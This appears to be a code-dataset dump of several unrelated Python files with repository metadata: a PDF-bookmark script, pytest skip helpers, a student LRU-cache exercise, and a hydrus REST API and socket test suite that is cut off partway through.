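print(manager.get_control("C1").serialize())  # single lookup, as in ControlsDAO.get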
b3ba1dada5fdca8c0505e224c5e297d351338eaf
721
py
Python
AddPDFBookmarks/handle_pdf.py
wanghuohuo0716/py-project
b771b8005d72843df1653ce68ddb67ccf77a57a8
[ "MIT" ]
92
2018-02-26T07:59:27.000Z
2022-03-31T08:57:51.000Z
AddPDFBookmarks/handle_pdf.py
Linkeer365/py-project
b771b8005d72843df1653ce68ddb67ccf77a57a8
[ "MIT" ]
2
2020-08-19T00:55:52.000Z
2021-03-08T07:37:32.000Z
AddPDFBookmarks/handle_pdf.py
Linkeer365/py-project
b771b8005d72843df1653ce68ddb67ccf77a57a8
[ "MIT" ]
53
2018-09-07T14:26:33.000Z
2022-03-31T08:57:53.000Z
# coding:utf-8
# Add PDF bookmarks

from pdf_utils import MyPDFHandler, PDFHandleMode as mode
import ConfigParser

import sys
reload(sys)
sys.setdefaultencoding('utf-8')


if __name__ == '__main__':
    main()
31.347826
88
0.71706
# coding:utf-8
# Add PDF bookmarks

from pdf_utils import MyPDFHandler, PDFHandleMode as mode
import ConfigParser

import sys
reload(sys)
sys.setdefaultencoding('utf-8')


def main():
    # Read the configuration from the config file
    cf = ConfigParser.SafeConfigParser()
    cf.read('./info.conf')
    pdf_path = cf.get('info', 'pdf_path')
    bookmark_file_path = cf.get('info', 'bookmark_file_path')
    page_offset = cf.getint('info', 'page_offset')
    new_pdf_file_name = cf.get('info', 'new_pdf_file_name')

    pdf_handler = MyPDFHandler(pdf_path, mode=mode.NEWLY)
    pdf_handler.add_bookmarks_by_read_txt(bookmark_file_path, page_offset=page_offset)
    pdf_handler.save2file(new_pdf_file_name)


if __name__ == '__main__':
    main()
516
0
25
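The script above is Python 2 (ConfigParser, reload(sys)); its configuration-reading half maps directly onto Python 3's configparser. The sketch below covers only that standard-library part, since MyPDFHandler comes from the repo's own pdf_utils module; the section and option names are the ones used in the script, and ./info.conf is assumed to exist:

# Python 3 equivalent of the config-reading portion of handle_pdf.py.
# Assumes ./info.conf exists and contains an [info] section with these keys.
import configparser

cf = configparser.ConfigParser()
cf.read('./info.conf')

pdf_path = cf.get('info', 'pdf_path')
bookmark_file_path = cf.get('info', 'bookmark_file_path')
page_offset = cf.getint('info', 'page_offset')
new_pdf_file_name = cf.get('info', 'new_pdf_file_name')

print(pdf_path, bookmark_file_path, page_offset, new_pdf_file_name)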
28cd58401f73165d35b3541ef644b2fdcb572816
1,638
py
Python
openff/utilities/testing.py
openforcefield/openff-utilities
89255d6cc9513df6ad5293841e86ab1f968f7e3b
[ "MIT" ]
null
null
null
openff/utilities/testing.py
openforcefield/openff-utilities
89255d6cc9513df6ad5293841e86ab1f968f7e3b
[ "MIT" ]
17
2021-06-09T06:46:20.000Z
2022-03-02T00:30:41.000Z
openff/utilities/testing.py
openforcefield/openff-utilities
89255d6cc9513df6ad5293841e86ab1f968f7e3b
[ "MIT" ]
null
null
null
from typing import List, Optional, Union

import pytest

from openff.utilities.utilities import has_executable, has_package


def skip_if_missing(package_name: str, reason: Optional[str] = None):
    """
    Helper function to generate a pytest.mark.skipif decorator
    for any package. This allows tests to be skipped if some
    optional dependency is not found.

    Parameters
    ----------
    package_name : str
        The name of the package that is required for a test(s)
    reason : str, optional
        Explanation of why the test is to be skipped

    Returns
    -------
    requires_package : _pytest.mark.structures.MarkDecorator
        A pytest decorator that will skip tests if the package is not available
    """
    if not reason:
        reason = f"Package {package_name} is required, but was not found."
    requires_package = pytest.mark.skipif(not has_package(package_name), reason=reason)
    return requires_package


def skip_if_missing_exec(exec: Union[str, List[str]]):
    """Helper function to generate a pytest.mark.skipif decorator
    if an executable(s) is not found."""
    if isinstance(exec, str):
        execs: List = [exec]
    elif isinstance(exec, list):
        execs: List = exec  # type: ignore[no-redef]
    else:
        raise ValueError(
            "Bad type passed to skip_if_missing_exec. " f"Found type {type(exec)}"
        )

    found_exec = False
    for exec_ in execs:
        found_exec = found_exec or has_executable(exec_)

    reason = f"Package {str(exec)} is required, but was not found."
    mark = pytest.mark.skipif(not found_exec, reason=reason)
    return mark
32.117647
87
0.681319
from typing import List, Optional, Union

import pytest

from openff.utilities.utilities import has_executable, has_package


def skip_if_missing(package_name: str, reason: Optional[str] = None):
    """
    Helper function to generate a pytest.mark.skipif decorator
    for any package. This allows tests to be skipped if some
    optional dependency is not found.

    Parameters
    ----------
    package_name : str
        The name of the package that is required for a test(s)
    reason : str, optional
        Explanation of why the test is to be skipped

    Returns
    -------
    requires_package : _pytest.mark.structures.MarkDecorator
        A pytest decorator that will skip tests if the package is not available
    """
    if not reason:
        reason = f"Package {package_name} is required, but was not found."
    requires_package = pytest.mark.skipif(not has_package(package_name), reason=reason)
    return requires_package


def skip_if_missing_exec(exec: Union[str, List[str]]):
    """Helper function to generate a pytest.mark.skipif decorator
    if an executable(s) is not found."""
    if isinstance(exec, str):
        execs: List = [exec]
    elif isinstance(exec, list):
        execs: List = exec  # type: ignore[no-redef]
    else:
        raise ValueError(
            "Bad type passed to skip_if_missing_exec. " f"Found type {type(exec)}"
        )

    found_exec = False
    for exec_ in execs:
        found_exec = found_exec or has_executable(exec_)

    reason = f"Package {str(exec)} is required, but was not found."
    mark = pytest.mark.skipif(not found_exec, reason=reason)
    return mark
0
0
0
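Because both helpers above return pytest.mark.skipif markers, they are applied as ordinary decorators on test functions. A short usage sketch; the package and executable names are arbitrary examples, not requirements of the library:

# Illustrative usage of skip_if_missing / skip_if_missing_exec as decorators.
from openff.utilities.testing import skip_if_missing, skip_if_missing_exec


@skip_if_missing("numpy")
def test_needs_numpy():
    import numpy as np
    assert np.zeros(3).sum() == 0


@skip_if_missing("some_optional_package", reason="needed only for the optional code path")
def test_needs_optional_dependency():
    ...


@skip_if_missing_exec(["packmol", "gmx"])  # skipped unless at least one executable is found
def test_needs_external_binary():
    ...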
8ef5b889f2b72b0ee8d71a6019e587e98cab7064
5,122
py
Python
projects/Show me the Data Structures/problem_1.py
gmendozah/Data-Structures-and-Algorithms
07474db45acfe42855cc0f4cc968c0564b2cb91a
[ "MIT" ]
5
2021-10-08T11:21:08.000Z
2022-01-24T22:40:03.000Z
projects/Show me the Data Structures/problem_1.py
gmendozah/Data-Structures-and-Algorithms
07474db45acfe42855cc0f4cc968c0564b2cb91a
[ "MIT" ]
null
null
null
projects/Show me the Data Structures/problem_1.py
gmendozah/Data-Structures-and-Algorithms
07474db45acfe42855cc0f4cc968c0564b2cb91a
[ "MIT" ]
3
2021-12-13T06:50:58.000Z
2022-02-05T03:38:49.000Z
if __name__ == '__main__':
    test_case_1()
    test_case_2()
    test_case_3()
31.423313
115
0.557595
class Node: def __init__(self, key=None, value=None): self.key = key self.value = value self.next = None self.prev = None class LRU_Cache(object): def __init__(self, capacity): if capacity < 1: print('LRUCache should have capacity > 0') return # Initialize class variables self.capacity = capacity self.size = 0 self.map = dict() self.head = None # this node represents the least recently used self.tail = None # this node represents the most recently used def get_capacity(self): return self.capacity def get(self, key): # Retrieve item from provided key. Return -1 if nonexistent. if key is None: return -1 elif key not in self.map: return -1 else: node = self.map[key] self.move_to_front(node) return node.value def set(self, key, value): # Set the value if the key is not present in the cache. If the cache is at capacity remove the oldest item. """ First. we validate the input key Second. we verify if key is already in the map If key in map: We update the node value and move it to the front If not in map: We create a new node and set it in the map Third: we validate if we passed the cache capacity """ if key is None or value is None: return -1 elif key not in self.map: node = Node(key, value) self.map[key] = node self.add(node) else: node = self.map[key] node.value = value self.move_to_front(node) if self.capacity < 0: self.remove_lru() def move_to_front(self, node): self.remove(node) self.add(node) def add(self, node): # add data to the next attribute of the tail (i.e. the end of the queue) # if head and tail have no values if self.head is None or self.tail is None: self.head = node self.tail = node # if the linked list has values already else: node.next = self.head node.prev = None self.head.prev = node self.head = node self.capacity = self.capacity - 1 def remove(self, node): # if the node we want to delete is the head if self.head.key == node.key: next_node = self.head.next self.head = next_node # if the node we want to delete is the tail elif self.tail.key == node.key: prev_node = self.tail.prev self.tail = prev_node # if none of the above happens else: prev_node = node.prev next_node = node.next prev_node.next = next_node next_node.prev = prev_node self.capacity += 1 def remove_lru(self): node = self.tail self.remove(node) del self.map[node.key] if __name__ == '__main__': def test_case_1(): # invalid length cache test case our_cache = LRU_Cache(-1) # should show an invalid capacity value def test_case_2(): # normal length cache test case our_cache = LRU_Cache(5) our_cache.set(1, 11) our_cache.set(2, 22) our_cache.set(3, 33) our_cache.set(4, 44) our_cache.set(5, 55) our_cache.set(6, 66) our_cache.set(7, 77) print(our_cache.get(1)) # returns -1 print(our_cache.get(2)) # returns -1 print(our_cache.get(3)) # returns 33 print(our_cache.get(7)) # returns 77 print(our_cache.get(6)) # returns 66 print(our_cache.get(4)) # returns 44 our_cache.set(8, 88) print(our_cache.get(5)) # returns -1 def test_case_3(): # short cache test case our_cache = LRU_Cache(3) our_cache.set(1, 1) our_cache.set(2, 2) our_cache.set(3, 3) our_cache.set(4, 4) print(our_cache.get(4)) # Expected Value = 4 print(our_cache.get(1)) # Expected Value = -1 our_cache.set(2, 4) print(our_cache.get(2)) # Expected Value = 4 our_cache.set(5, 5) print(our_cache.get(3)) # Expected Value = -1 print(our_cache.get(5)) # Expected Value = 5 our_cache.set(2, 6) print(our_cache.get(2)) # Expected Value = 6 our_cache.set(6, 6) print(our_cache.get(4)) # Expected Value = -1 print(our_cache.get(6)) # Expected Value = 6 our_cache.set(5, 10) 
our_cache.set(7, 7) print(our_cache.get(2)) # Expected Value = -1 print(our_cache.get(7)) # Expected Value = 7 print(our_cache.get(6)) # Expected Value = 6 print(our_cache.get(5)) # Expected Value = 10 print(our_cache.get(5)) # Expected Value = 10 our_cache.set(8, 8) print(our_cache.get(7)) # Expected Value = -1 test_case_1() test_case_2() test_case_3()
3,821
1,075
151
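The record above builds the LRU cache from an explicit doubly linked list plus a dict. The same get/set behaviour can also be sketched on top of collections.OrderedDict, which tracks insertion order and offers move_to_end and popitem; this is an alternative illustration, not the project's implementation:

# Compact LRU sketch using collections.OrderedDict instead of a hand-rolled
# doubly linked list. Same behaviour as above: get() returns -1 on a miss,
# set() evicts the least recently used entry once capacity is exceeded.
from collections import OrderedDict


class LRUCache:

    def __init__(self, capacity):
        self.capacity = capacity
        self._data = OrderedDict()

    def get(self, key):
        if key not in self._data:
            return -1
        self._data.move_to_end(key)          # mark as most recently used
        return self._data[key]

    def set(self, key, value):
        if key in self._data:
            self._data.move_to_end(key)
        self._data[key] = value
        if len(self._data) > self.capacity:
            self._data.popitem(last=False)   # evict least recently used


cache = LRUCache(2)
cache.set(1, 11)
cache.set(2, 22)
cache.set(3, 33)       # evicts key 1
print(cache.get(1))    # -1
print(cache.get(3))    # 33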
8246e38f21bcb46e020f248157401bcc92b6f2e7
45,802
py
Python
hydrus/tests/test_app.py
vcode11/hydrus
4ed8ada7ed8fd7d8897e744bae410b312f4cfb83
[ "MIT" ]
1
2019-12-04T12:54:21.000Z
2019-12-04T12:54:21.000Z
hydrus/tests/test_app.py
vcode11/hydrus
4ed8ada7ed8fd7d8897e744bae410b312f4cfb83
[ "MIT" ]
3
2019-12-21T04:15:23.000Z
2020-04-07T05:11:05.000Z
hydrus/tests/test_app.py
vcode11/hydrus
4ed8ada7ed8fd7d8897e744bae410b312f4cfb83
[ "MIT" ]
null
null
null
"""Test for checking if the response format is proper. Run test_crud before running this.""" import unittest import random import string import json import re import uuid from hydrus.app_factory import app_factory from hydrus.socketio_factory import create_socket from hydrus.utils import set_session, set_doc, set_api_name, set_page_size from hydrus.data import doc_parse, crud from hydra_python_core import doc_maker from hydra_python_core.doc_writer import HydraLink from hydrus.samples import doc_writer_sample from sqlalchemy import create_engine from sqlalchemy.orm import sessionmaker, scoped_session from hydrus.data.db_models import Base def gen_dummy_object(class_title, doc): """Create a dummy object based on the definitions in the API Doc. :param class_title: Title of the class whose object is being created. :param doc: ApiDoc. :return: A dummy object of class `class_title`. """ object_ = { "@type": class_title } for class_path in doc.parsed_classes: if class_title == doc.parsed_classes[class_path]["class"].title: for prop in doc.parsed_classes[class_path]["class"].supportedProperty: if isinstance(prop.prop, HydraLink) or prop.write is False: continue if "vocab:" in prop.prop: prop_class = prop.prop.replace("vocab:", "") object_[prop.title] = gen_dummy_object(prop_class, doc) else: object_[prop.title] = ''.join(random.choice( string.ascii_uppercase + string.digits) for _ in range(6)) return object_ class ViewsTestCase(unittest.TestCase): """Test Class for the app.""" @classmethod def setUpClass(self): """Database setup before the tests.""" print("Creating a temporary database...") engine = create_engine('sqlite:///:memory:') Base.metadata.create_all(engine) session = scoped_session(sessionmaker(bind=engine)) self.session = session self.API_NAME = "demoapi" self.page_size = 1 self.HYDRUS_SERVER_URL = "http://hydrus.com/" self.app = app_factory(self.API_NAME) self.socketio = create_socket(self.app, self.session) print("going for create doc") self.doc = doc_maker.create_doc( doc_writer_sample.api_doc.generate(), self.HYDRUS_SERVER_URL, self.API_NAME) test_classes = doc_parse.get_classes(self.doc.generate()) test_properties = doc_parse.get_all_properties(test_classes) doc_parse.insert_classes(test_classes, self.session) doc_parse.insert_properties(test_properties, self.session) print("Classes and properties added successfully.") print("Setting up hydrus utilities... ") self.api_name_util = set_api_name(self.app, self.API_NAME) self.session_util = set_session(self.app, self.session) self.doc_util = set_doc(self.app, self.doc) self.page_size_util = set_page_size(self.app, self.page_size) self.client = self.app.test_client() print("Creating utilities context... 
") self.api_name_util.__enter__() self.session_util.__enter__() self.doc_util.__enter__() self.client.__enter__() print("Setup done, running tests...") @classmethod def tearDownClass(self): """Tear down temporary database and exit utilities""" self.client.__exit__(None, None, None) self.doc_util.__exit__(None, None, None) self.session_util.__exit__(None, None, None) self.api_name_util.__exit__(None, None, None) self.session.close() def test_Index(self): """Test for the index.""" response_get = self.client.get("/{}".format(self.API_NAME)) endpoints = json.loads(response_get.data.decode('utf-8')) response_post = self.client.post( "/{}".format(self.API_NAME), data=dict(foo="bar")) response_put = self.client.put( "/{}".format(self.API_NAME), data=dict(foo="bar")) response_delete = self.client.delete("/{}".format(self.API_NAME)) assert "@context" in endpoints assert endpoints["@id"] == "/{}".format(self.API_NAME) assert endpoints["@type"] == "EntryPoint" assert response_get.status_code == 200 assert response_post.status_code == 405 assert response_put.status_code == 405 assert response_delete.status_code == 405 def test_EntryPoint_context(self): """Test for the EntryPoint context.""" response_get = self.client.get( "/{}/contexts/EntryPoint.jsonld".format(self.API_NAME)) response_get_data = json.loads(response_get.data.decode('utf-8')) response_post = self.client.post( "/{}/contexts/EntryPoint.jsonld".format(self.API_NAME), data={}) response_delete = self.client.delete( "/{}/contexts/EntryPoint.jsonld".format(self.API_NAME)) assert response_get.status_code == 200 assert "@context" in response_get_data assert response_post.status_code == 405 assert response_delete.status_code == 405 def test_Vocab(self): """Test the vocab.""" response_get = self.client.get("/{}/vocab#".format(self.API_NAME)) response_get_data = json.loads(response_get.data.decode('utf-8')) assert "@context" in response_get_data assert response_get_data["@type"] == "ApiDocumentation" assert response_get_data["@id"] == "{}{}/vocab".format( self.HYDRUS_SERVER_URL, self.API_NAME) assert response_get.status_code == 200 response_delete = self.client.delete( "/{}/vocab#".format(self.API_NAME)) assert response_delete.status_code == 405 response_put = self.client.put( "/{}/vocab#".format(self.API_NAME), data=json.dumps(dict(foo='bar'))) assert response_put.status_code == 405 response_post = self.client.post( "/{}/vocab#".format(self.API_NAME), data=json.dumps(dict(foo='bar'))) assert response_post.status_code == 405 def test_Collections_GET(self): """Test GET on collection endpoints.""" index = self.client.get("/{}".format(self.API_NAME)) assert index.status_code == 200 endpoints = json.loads(index.data.decode('utf-8')) for endpoint in endpoints: collection_name = "/".join(endpoints[endpoint].split( "/{}/".format(self.API_NAME))[1:]) if collection_name in self.doc.collections: response_get = self.client.get(endpoints[endpoint]) # pdb.set_trace() assert response_get.status_code == 200 response_get_data = json.loads( response_get.data.decode('utf-8')) assert "@context" in response_get_data assert "@id" in response_get_data assert "@type" in response_get_data assert "members" in response_get_data # Check the item URI has the valid format, so it can be dereferenced if len(response_get_data["members"]) > 0: for item in response_get_data["members"]: class_type = item["@type"] if class_type in self.doc.parsed_classes: class_ = self.doc.parsed_classes[class_type]["class"] class_methods = [ x.method for x in class_.supportedOperation] if "GET" in 
class_methods: item_response = self.client.get( response_get_data["members"][0]["@id"]) assert item_response.status_code == 200 def test_pagination(self): """Test basic pagination""" index = self.client.get("/{}".format(self.API_NAME)) assert index.status_code == 200 endpoints = json.loads(index.data.decode('utf-8')) for endpoint in endpoints: collection_name = "/".join(endpoints[endpoint].split( "/{}/".format(self.API_NAME))[1:]) if collection_name in self.doc.collections: response_get = self.client.get(endpoints[endpoint]) assert response_get.status_code == 200 response_get_data = json.loads( response_get.data.decode('utf-8')) assert "view" in response_get_data assert "first" in response_get_data["view"] assert "last" in response_get_data["view"] if "next" in response_get_data["view"]: response_next = self.client.get(response_get_data["view"]["next"]) assert response_next.status_code == 200 response_next_data = json.loads( response_next.data.decode('utf-8')) assert "previous" in response_next_data["view"] break def test_Collections_PUT(self): """Test insert data to the collection.""" index = self.client.get("/{}".format(self.API_NAME)) assert index.status_code == 200 endpoints = json.loads(index.data.decode('utf-8')) for endpoint in endpoints: collection_name = "/".join(endpoints[endpoint].split( "/{}/".format(self.API_NAME))[1:]) if collection_name in self.doc.collections: collection = self.doc.collections[collection_name]["collection"] dummy_object = gen_dummy_object( collection.class_.title, self.doc) good_response_put = self.client.put( endpoints[endpoint], data=json.dumps(dummy_object)) assert good_response_put.status_code == 201 def test_object_POST(self): """Test replace of a given object using ID.""" index = self.client.get("/{}".format(self.API_NAME)) assert index.status_code == 200 endpoints = json.loads(index.data.decode('utf-8')) for endpoint in endpoints: collection_name = "/".join(endpoints[endpoint].split( "/{}/".format(self.API_NAME))[1:]) if collection_name in self.doc.collections: collection = self.doc.collections[collection_name]["collection"] class_ = self.doc.parsed_classes[collection.class_.title]["class"] class_methods = [x.method for x in class_.supportedOperation] dummy_object = gen_dummy_object( collection.class_.title, self.doc) initial_put_response = self.client.put( endpoints[endpoint], data=json.dumps(dummy_object)) assert initial_put_response.status_code == 201 response = json.loads( initial_put_response.data.decode('utf-8')) regex = r'(.*)ID (.{36})* (.*)' matchObj = re.match(regex, response["description"]) assert matchObj is not None id_ = matchObj.group(2) if "POST" in class_methods: dummy_object = gen_dummy_object( collection.class_.title, self.doc) post_replace_response = self.client.post( '{}/{}'.format(endpoints[endpoint], id_), data=json.dumps(dummy_object)) assert post_replace_response.status_code == 200 def test_object_DELETE(self): """Test DELETE of a given object using ID.""" index = self.client.get("/{}".format(self.API_NAME)) assert index.status_code == 200 endpoints = json.loads(index.data.decode('utf-8')) for endpoint in endpoints: collection_name = "/".join(endpoints[endpoint].split( "/{}/".format(self.API_NAME))[1:]) if collection_name in self.doc.collections: collection = self.doc.collections[collection_name]["collection"] class_ = self.doc.parsed_classes[collection.class_.title]["class"] class_methods = [x.method for x in class_.supportedOperation] dummy_object = gen_dummy_object( collection.class_.title, self.doc) initial_put_response = 
self.client.put( endpoints[endpoint], data=json.dumps(dummy_object)) assert initial_put_response.status_code == 201 response = json.loads( initial_put_response.data.decode('utf-8')) regex = r'(.*)ID (.{36})* (.*)' matchObj = re.match(regex, response["description"]) assert matchObj is not None id_ = matchObj.group(2) if "DELETE" in class_methods: delete_response = self.client.delete( '{}/{}'.format(endpoints[endpoint], id_)) assert delete_response.status_code == 200 def test_object_PUT_at_id(self): """Create object in collection using PUT at specific ID.""" index = self.client.get("/{}".format(self.API_NAME)) assert index.status_code == 200 endpoints = json.loads(index.data.decode('utf-8')) for endpoint in endpoints: collection_name = "/".join(endpoints[endpoint].split( "/{}/".format(self.API_NAME))[1:]) if collection_name in self.doc.collections: collection = self.doc.collections[collection_name]["collection"] class_ = self.doc.parsed_classes[collection.class_.title]["class"] class_methods = [x.method for x in class_.supportedOperation] dummy_object = gen_dummy_object( collection.class_.title, self.doc) if "PUT" in class_methods: dummy_object = gen_dummy_object( collection.class_.title, self.doc) put_response = self.client.put('{}/{}'.format( endpoints[endpoint], uuid.uuid4()), data=json.dumps(dummy_object)) assert put_response.status_code == 201 def test_endpointClass_PUT(self): """Check non collection Class PUT.""" index = self.client.get("/{}".format(self.API_NAME)) assert index.status_code == 200 endpoints = json.loads(index.data.decode('utf-8')) for endpoint in endpoints: if endpoint not in ["@context", "@id", "@type"]: class_name = "/".join(endpoints[endpoint].split( "/{}/".format(self.API_NAME))[1:]) if class_name not in self.doc.collections: class_ = self.doc.parsed_classes[class_name]["class"] class_methods = [ x.method for x in class_.supportedOperation] if "PUT" in class_methods: dummy_object = gen_dummy_object(class_.title, self.doc) put_response = self.client.put( endpoints[endpoint], data=json.dumps(dummy_object)) assert put_response.status_code == 201 def test_endpointClass_POST(self): """Check non collection Class POST.""" index = self.client.get("/{}".format(self.API_NAME)) assert index.status_code == 200 endpoints = json.loads(index.data.decode('utf-8')) for endpoint in endpoints: if endpoint not in ["@context", "@id", "@type"]: class_name = "/".join(endpoints[endpoint].split( "/{}/".format(self.API_NAME))[1:]) if class_name not in self.doc.collections: class_ = self.doc.parsed_classes[class_name]["class"] class_methods = [ x.method for x in class_.supportedOperation] if "POST" in class_methods: dummy_object = gen_dummy_object(class_.title, self.doc) post_response = self.client.post( endpoints[endpoint], data=json.dumps(dummy_object)) assert post_response.status_code == 200 def test_endpointClass_DELETE(self): """Check non collection Class DELETE.""" index = self.client.get("/{}".format(self.API_NAME)) assert index.status_code == 200 endpoints = json.loads(index.data.decode('utf-8')) for endpoint in endpoints: if endpoint not in ["@context", "@id", "@type"]: class_name = "/".join(endpoints[endpoint].split( "/{}/".format(self.API_NAME))[1:]) if class_name not in self.doc.collections: class_ = self.doc.parsed_classes[class_name]["class"] class_methods = [ x.method for x in class_.supportedOperation] if "DELETE" in class_methods: delete_response = self.client.delete( endpoints[endpoint]) assert delete_response.status_code == 200 def test_endpointClass_GET(self): """Check non 
collection Class GET.""" index = self.client.get("/{}".format(self.API_NAME)) assert index.status_code == 200 endpoints = json.loads(index.data.decode('utf-8')) for endpoint in endpoints: if endpoint not in ["@context", "@id", "@type"]: class_name = "/".join(endpoints[endpoint].split( "/{}/".format(self.API_NAME))[1:]) if class_name not in self.doc.collections: class_ = self.doc.parsed_classes[class_name]["class"] class_methods = [ x.method for x in class_.supportedOperation] if "GET" in class_methods: response_get = self.client.get(endpoints[endpoint]) assert response_get.status_code == 200 response_get_data = json.loads( response_get.data.decode('utf-8')) assert "@context" in response_get_data assert "@id" in response_get_data assert "@type" in response_get_data def test_IriTemplate(self): """Test structure of IriTemplates attached to collections""" index = self.client.get("/{}".format(self.API_NAME)) assert index.status_code == 200 endpoints = json.loads(index.data.decode('utf-8')) for endpoint in endpoints: collection_name = "/".join(endpoints[endpoint].split( "/{}/".format(self.API_NAME))[1:]) if collection_name in self.doc.collections: response_get = self.client.get(endpoints[endpoint]) assert response_get.status_code == 200 response_get_data = json.loads( response_get.data.decode('utf-8')) assert "search" in response_get_data assert "mapping" in response_get_data["search"] collection = self.doc.collections[collection_name]["collection"] class_ = self.doc.parsed_classes[collection.class_.title]["class"] class_props = [x.prop for x in class_.supportedProperty] for mapping in response_get_data["search"]["mapping"]: if mapping["property"] not in ["limit", "offset", "pageIndex"]: assert mapping["property"] in class_props def test_client_controlled_pagination(self): """Test pagination controlled by client with help of pageIndex, offset and limit parameters.""" index = self.client.get("/{}".format(self.API_NAME)) assert index.status_code == 200 endpoints = json.loads(index.data.decode('utf-8')) for endpoint in endpoints: collection_name = "/".join(endpoints[endpoint].split( "/{}/".format(self.API_NAME))[1:]) if collection_name in self.doc.collections: response_get = self.client.get(endpoints[endpoint]) assert response_get.status_code == 200 response_get_data = json.loads( response_get.data.decode('utf-8')) assert "search" in response_get_data assert "mapping" in response_get_data["search"] # Test with pageIndex and limit params = {"pageIndex": 1, "limit": 2} response_for_page_param = self.client.get(endpoints[endpoint], query_string=params) assert response_for_page_param.status_code == 200 response_for_page_param_data = json.loads( response_for_page_param.data.decode('utf-8')) assert "first" in response_for_page_param_data["view"] assert "last" in response_for_page_param_data["view"] if "next" in response_for_page_param_data["view"]: assert "pageIndex=2" in response_for_page_param_data["view"]["next"] next_response = self.client.get(response_for_page_param_data["view"]["next"]) assert next_response.status_code == 200 next_response_data = json.loads( next_response.data.decode('utf-8')) assert "previous" in next_response_data["view"] assert "pageIndex=1" in next_response_data["view"]["previous"] # Test with offset and limit params = {"offset": 1, "limit": 2} response_for_offset_param = self.client.get(endpoints[endpoint], query_string=params) assert response_for_offset_param.status_code == 200 response_for_offset_param_data = json.loads( response_for_offset_param.data.decode('utf-8')) assert 
"first" in response_for_offset_param_data["view"] assert "last" in response_for_offset_param_data["view"] if "next" in response_for_offset_param_data["view"]: assert "offset=3" in response_for_offset_param_data["view"]["next"] next_response = self.client.get( response_for_offset_param_data["view"]["next"]) assert next_response.status_code == 200 next_response_data = json.loads( next_response.data.decode('utf-8')) assert "previous" in next_response_data["view"] assert "offset=1" in next_response_data["view"]["previous"] def test_bad_objects(self): """Checks if bad objects are added or not.""" index = self.client.get("/{}".format(self.API_NAME)) assert index.status_code == 200 endpoints = json.loads(index.data.decode('utf-8')) for endpoint in endpoints: collection_name = "/".join(endpoints[endpoint].split( "/{}/".format(self.API_NAME))[1:]) if collection_name in self.doc.collections: bad_response_put = self.client.put( endpoints[endpoint], data=json.dumps( dict( foo='bar'))) assert bad_response_put.status_code == 400 def test_bad_requests(self): """Checks if bad requests are handled or not.""" index = self.client.get("/{}".format(self.API_NAME)) assert index.status_code == 200 endpoints = json.loads(index.data.decode('utf-8')) for endpoint in endpoints: collection_name = "/".join(endpoints[endpoint].split( "/{}/".format(self.API_NAME))[1:]) if collection_name in self.doc.collections: collection = self.doc.collections[collection_name]["collection"] class_ = self.doc.parsed_classes[collection.class_.title]["class"] class_methods = [x.method for x in class_.supportedOperation] dummy_object = gen_dummy_object( collection.class_.title, self.doc) initial_put_response = self.client.put( endpoints[endpoint], data=json.dumps(dummy_object)) assert initial_put_response.status_code == 201 response = json.loads( initial_put_response.data.decode('utf-8')) regex = r'(.*)ID (.{36})* (.*)' matchObj = re.match(regex, response["description"]) assert matchObj is not None id_ = matchObj.group(2) if "POST" not in class_methods: dummy_object = gen_dummy_object( collection.class_.title, self.doc) post_replace_response = self.client.post( '{}/{}'.format(endpoints[endpoint], id_), data=json.dumps(dummy_object)) assert post_replace_response.status_code == 405 if "DELETE" not in class_methods: delete_response = self.client.delete( '{}/{}'.format(endpoints[endpoint], id_)) assert delete_response.status_code == 405 def test_Endpoints_Contexts(self): """Test all endpoints contexts are generated properly.""" index = self.client.get("/{}".format(self.API_NAME)) assert index.status_code == 200 endpoints = json.loads(index.data.decode('utf-8')) for endpoint in endpoints: collection_name = "/".join(endpoints[endpoint].split( "/{}/".format(self.API_NAME))[1:]) if collection_name in self.doc.collections: response_get = self.client.get(endpoints[endpoint]) assert response_get.status_code == 200 context = json.loads( response_get.data.decode('utf-8'))["@context"] response_context = self.client.get(context) response_context_data = json.loads( response_context.data.decode('utf-8')) assert response_context.status_code == 200 assert "@context" in response_context_data class SocketTestCase(unittest.TestCase): """Test Class for socket events and operations.""" @classmethod def setUpClass(self): """Database setup before the tests.""" print("Creating a temporary database...") engine = create_engine('sqlite:///:memory:') Base.metadata.create_all(engine) session = scoped_session(sessionmaker(bind=engine)) self.session = session 
self.API_NAME = "demoapi" self.page_size = 1 self.HYDRUS_SERVER_URL = "http://hydrus.com/" self.app = app_factory(self.API_NAME) self.socketio = create_socket(self.app, self.session) print("going for create doc") self.doc = doc_maker.create_doc( doc_writer_sample.api_doc.generate(), self.HYDRUS_SERVER_URL, self.API_NAME) test_classes = doc_parse.get_classes(self.doc.generate()) test_properties = doc_parse.get_all_properties(test_classes) doc_parse.insert_classes(test_classes, self.session) doc_parse.insert_properties(test_properties, self.session) print("Classes and properties added successfully.") print("Setting up hydrus utilities... ") self.api_name_util = set_api_name(self.app, self.API_NAME) self.session_util = set_session(self.app, self.session) self.doc_util = set_doc(self.app, self.doc) self.page_size_util = set_page_size(self.app, self.page_size) self.client = self.app.test_client() self.socketio_client = self.socketio.test_client(self.app, namespace='/sync') print("Creating utilities context... ") self.api_name_util.__enter__() self.session_util.__enter__() self.doc_util.__enter__() self.client.__enter__() print("Setup done, running tests...") @classmethod def tearDownClass(self): """Tear down temporary database and exit utilities""" self.client.__exit__(None, None, None) self.doc_util.__exit__(None, None, None) self.session_util.__exit__(None, None, None) self.api_name_util.__exit__(None, None, None) self.session.close() def test_connect(self): """Test connect event.""" socket_client = self.socketio.test_client(self.app, namespace='/sync') data = socket_client.get_received('/sync') assert len(data) > 0 event = data[0] assert event['name'] == 'connect' last_job_id = crud.get_last_modification_job_id(self.session) assert event['args'][0]['last_job_id'] == last_job_id socket_client.disconnect(namespace='/sync') def test_reconnect(self): """Test reconnect event.""" socket_client = self.socketio.test_client(self.app, namespace='/sync') # Flush data of first connect event socket_client.get_received('/sync') # Client reconnects by emitting 'reconnect' event. socket_client.emit('reconnect', namespace='/sync') # Get update received on reconnecting to the server data = socket_client.get_received('/sync') assert len(data) > 0 # Extract the event information event = data[0] assert event['name'] == 'connect' last_job_id = crud.get_last_modification_job_id(self.session) # Check last job id with last_job_id received by client in the update. assert event['args'][0]['last_job_id'] == last_job_id socket_client.disconnect(namespace='/sync') def test_modification_table_diff(self): """Test 'modification-table-diff' events.""" # Flush old received data at socket client self.socketio_client.get_received('/sync') # Set last_job_id as the agent_job_id agent_job_id = crud.get_last_modification_job_id(self.session) # Add an extra modification record newer than the agent_job_id new_latest_job_id = crud.insert_modification_record(method="POST", resource_url="", session=self.session) self.socketio_client.emit('get_modification_table_diff', {'agent_job_id': agent_job_id}, namespace='/sync') data = self.socketio_client.get_received('/sync') assert len(data) > 0 event = data[0] assert 